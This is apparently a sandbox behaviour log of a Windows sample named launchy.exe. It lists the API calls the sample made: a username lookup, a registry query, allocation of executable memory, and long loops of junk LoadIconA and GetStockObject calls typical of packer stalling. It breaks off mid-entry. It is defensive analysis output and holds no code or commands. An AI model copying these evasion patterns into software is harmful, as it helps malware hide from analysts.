# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: May 6 2020 08:26:37 # Log Creation Date: 02.06.2020 00:20:09.556 Process: id = "1" image_name = "launchy.exe" filename = "c:\\users\\fd1hvy\\desktop\\launchy.exe" page_root = "0xcbc4000" os_pid = "0x11c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x11a4 [0088.456] LoadCursorW (hInstance=0x0, lpCursorName=0x257f) returned 0x0 [0088.566] GetUserNameA (in: lpBuffer=0x19ff10, pcbBuffer=0x19ff7c | out: lpBuffer="FD1HVy", pcbBuffer=0x19ff7c) returned 1 [0088.573] GetEnhMetaFileW (lpName="7589678967896789") returned 0x0 [0088.574] GetLastError () returned 0x2 [0088.574] LoadLibraryA (lpLibFileName="advapi32") returned 0x756e0000 [0088.574] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExA") returned 0x756ff020 [0088.574] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x50d690 | out: phkResult=0x50d690*=0x246) returned 0x0 [0088.577] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0088.577] RegQueryValueExA (in: hKey=0x246, lpValueName="", lpReserved=0x0, lpType=0x19feb4, lpData=0x19fde8, lpcbData=0x50d368*=0xc8 | out: lpType=0x19feb4*=0x1, lpData="IEnumConnections", lpcbData=0x50d368*=0x11) returned 0x0 [0088.577] LoadLibraryA (lpLibFileName="kernel32") returned 0x772d0000 [0088.577] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0088.577] VirtualAlloc (lpAddress=0x0, dwSize=0xf200, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0088.578] LoadIconA (hInstance=0x0, lpIconName=0x24a7) returned 0x0 [0088.578] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.578] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.578] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.579] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.580] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.581] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.582] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.583] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.584] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.585] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.586] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.587] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0088.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.603] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.604] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.605] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.606] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0088.607] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0091.989] GetKeyState (nVirtKey=1) returned 0 [0091.989] GetStretchBltMode (hdc=0x1) returned 0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetStockObject (i=789644) returned 0x0 [0091.990] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.991] GetKeyState (nVirtKey=1) returned 0 [0091.991] GetStretchBltMode (hdc=0x1) returned 0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetStockObject (i=789644) returned 0x0 [0091.991] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.992] GetKeyState (nVirtKey=1) returned 0 [0091.992] GetStretchBltMode (hdc=0x1) returned 0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.992] GetKeyState (nVirtKey=1) returned 0 [0091.992] GetStretchBltMode (hdc=0x1) returned 0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.992] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.993] GetKeyState (nVirtKey=1) returned 0 [0091.993] GetStretchBltMode (hdc=0x1) returned 0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetStockObject (i=789644) returned 0x0 [0091.993] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.994] GetKeyState (nVirtKey=1) returned 0 [0091.994] GetStretchBltMode (hdc=0x1) returned 0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.994] GetKeyState (nVirtKey=1) returned 0 [0091.994] GetStretchBltMode (hdc=0x1) returned 0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.994] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.995] GetKeyState (nVirtKey=1) returned 0 [0091.995] GetStretchBltMode 